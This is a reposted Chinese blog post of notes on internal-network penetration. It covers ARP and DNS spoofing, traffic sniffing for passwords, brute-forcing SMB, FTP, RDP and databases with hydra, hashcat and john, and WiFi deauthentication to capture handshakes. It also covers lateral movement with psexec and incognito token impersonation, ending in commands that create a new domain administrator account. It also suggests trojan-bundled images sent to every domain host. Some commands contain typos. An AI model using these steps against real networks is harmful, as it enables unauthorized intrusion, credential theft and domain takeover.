内网渗透思路&amp；相关服务爆破以及提权

横向渗透有多少种方法

1. 扫描漏洞-漏洞利用（下述的所有方法都有一个条件，那就是都是可以进行网络服务的）
2. 了解网络（信息收集）
3. 分析网络中有那些主机（分析是个人pc还是server，系统是Windows还是Linux还是打印机）
4. 分析服务，分析端口
5. 扫描器分析服务

服务器攻击有哪些

1.爆破 2漏洞 3.欺诈 4.钓鱼

常用的流量监听工具：wiresharke，cain（也不是什么都能抓到,能抓到的都是一些未加密的流量，而且cain有限制，server2003之后的系统就用不了了）

cain的能抓的东西很多，但是很麻烦，需要arp欺诈，但arp欺诈容易被蓝队发现，蓝队也不是傻子，看到局域网内有两个mac地址一样的主机直接封了

要是像轻松一点，建议还是老老实实无脑wireshark（但wireshark需要开远连，容易被发现）

假如用wireshark抓包，在数条流量包中需要注意什么数据包，以及过滤的表达式该怎么写

（1）网段，抓取内网不同网段，进行纵向渗透

（2）抓取密文

（3）关于过滤指定ip地址的表达式的写法：http&&ip src==(指定内网ip(源地址))，要是想看内密码的报文只用关注post数据包就行了，要是看请求数据包看get数据包就行

如果是查看所有访问者访问特定地址的流量的过滤表达式写法为：http&&ip.dst(指定内网ip地址)

监听内容：服务连接密码，网站登录密码，敏感数据

现在内网网络均为交换机网络，所有的流量都经过交换机，因此在对目标主机进行流量监听时需要对交换机进行arp欺诈

但是如果我就要抓加密信息那该怎么办:1.我们强制转换它使用http协议 2.钓鱼

（关于密码/密文 ，可以把这些消息近似的看成一个是时间函数，其具时效性，任何密码/密文都可以进行解码，但解码出的那一刻便就失效，莫名伤感......)

内网渗透(arp欺骗 + DNS欺骗 + 网站钓鱼) - qiyeNuLl's blog

上面文章真是一条龙啊（内网的arp dns 钓鱼网站一条龙服务）

要是上面文章还是没搞明白，那么可以试一试kali自带的ettercap这玩意也是好用的，arp欺骗，dns欺骗，内网非https的流量也是可以抓到的（傻瓜式的工具）

内网渗透新思路：图片文件，在shell进内网的跳板机后，抓取图片文件，对图片文件进行修改捆绑木马，在发送给域内所有的主机，那么就成了，内网内=所有的机子都中招，接下来该拖库拖库，提权持权就行了

密码攻击

在线密码攻击：通过网络进行密码爆破（主要因素还是网络因素，在线爆破吃网络）

离线密码攻击：加载字典进行本地爆破（这个就是靠本设备的性能了，吃cpu和gpu了）

一般例如smb，telnet，ftp，3389，数据库如（MySQL mssql）等，尤其是ftp与数据库爆破，ftp某些账户的权限高的可以对c盘根目录文件进行任意文件读取，而数据库权限在做完udf提权后完全可以做到拖库删库跑路

对开放端口进行服务端口进判断

Linux：/22/80/443/21/

windows:/135/139/445/3306/1433/3899

windows要是扫到的445就优先跑445 ，为什么，问就是响应快，内网所有服务当被探测到时都遵循一个原则，那就是谁响应块就优先爆破谁

爆破工具

1.hydra(爆破服务专用，例如telnet ftp ssh等)

2.crunch(用于生成字典)

3.medusa(感觉不如hydra好用)

4.hashcat（好用的一比，支持cpu和gpu爆破，还可以边生成边爆破，例如用于爆破windows的hash密文获取用户账号和密码，建议配合pwdump使用）

//pwdump是用于获取本机/被攻击机的hash值的工具用法看这篇pwdump工具使用 - FreeBuf网络安全行业门户

5.John（专门用于爆破非对称加密密文，例如用于爆破Linux /etc/passwd目录下的账号和密码，不管什么加密一把梭就行了）

6Fcrackzip (专门用于破解压缩包密码)

（题外话，john和hashcat也不是万能的，也会梭不出来）

wifi攻击

（题外话：建议在做内网渗透时用加一块物理网卡，为什么，很简单，当你开代理进行网络攻击时，你的ip地址在不断变化，但是你的mac地址始终是不变的，当后台管理与员查看netlog时很有可能会根据你的mac地址从而进行溯源）

内网WiFi流程，首先exp打包发送到被攻击主机

ifconfig/ipconfig
airmon-ng check kill(结束进程)
airmon-ng start //对应的网卡// ,敲完这个指令后会在原有的网卡上加上一个mon
airodump-ng //对应的网卡//mon (建立监听)
airdump-ng -c 4 -w result --bssid 目标mac //对应的网卡//mon(进行抓包)
airepiay-ng -0 10 -a 目标ap的mac -c客户端mac //对应的网卡//mon(客户端是在一个局域网内对与局域网进行连接的设备，上一步骤执行完后可以看到，这一部的目的就是利用庞大的数据流down掉客户端与目标ap的连接，当客户端与ap重新进行三次握手时抓取tap包，那么就可以实现wifi的爆破)

7爆破字典建议还是用hashcat，怎么用建议自己上网找

第三方软件爆破，例如：phpmyadmin等第三方软件爆破

获取本地账号密码，构造跳板

那么除了利用msf反弹shell和猕猴桃进行提权外就没有其他办法了吗，有肯定是有的，就是比较麻烦，条件也比较苛刻

1.利用445端口的smb服务跳机，利用psexec可以实现跳机的目的（前提是没有开启防火墙拦截445）

例如：psexec.exe \\192.168.200.11 -u administrator -p 123123 cmd

2.利用incongnito进行提权

incongnito.exe list_tokens-u

（不是，还真有啊）

incongnito.exe -h 192.168.200.11 -u admin - p123123 list_tokens -u 

c:\incongnito2>incongnito.exe -h 192.168.200.11 -u admin -p 123123 execute -c"NT AUTHORITY\SYSTEM" cmd .exe

但是要注意，我们的目的不仅仅是拿到本地管理员权限，还要拿到域控管理员权限，利用跳板一点点去试，直到跳到域控机子拿到域控管理员的token，调用域控的cmd，从而控制域

假设我只知道我这台机子有域控的token但不知道密码怎么办

也很简单，直接以域控的身份打开cmd，然后再新建一个域控账号不久完事了

c:\incongnito2>incongnito.exe -h 192.168.200.11 -u admin -p 123123 execute -c"XY\administrator" cmd .exe

net user haha 123.com /add

net user haha 123.com /add /domain

net ground "domain admins" haha /add /domain

 注：感谢枫何师傅提供的思路

原文地址：https://blog.csdn.net/CLAY0011/article/details/144788578

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！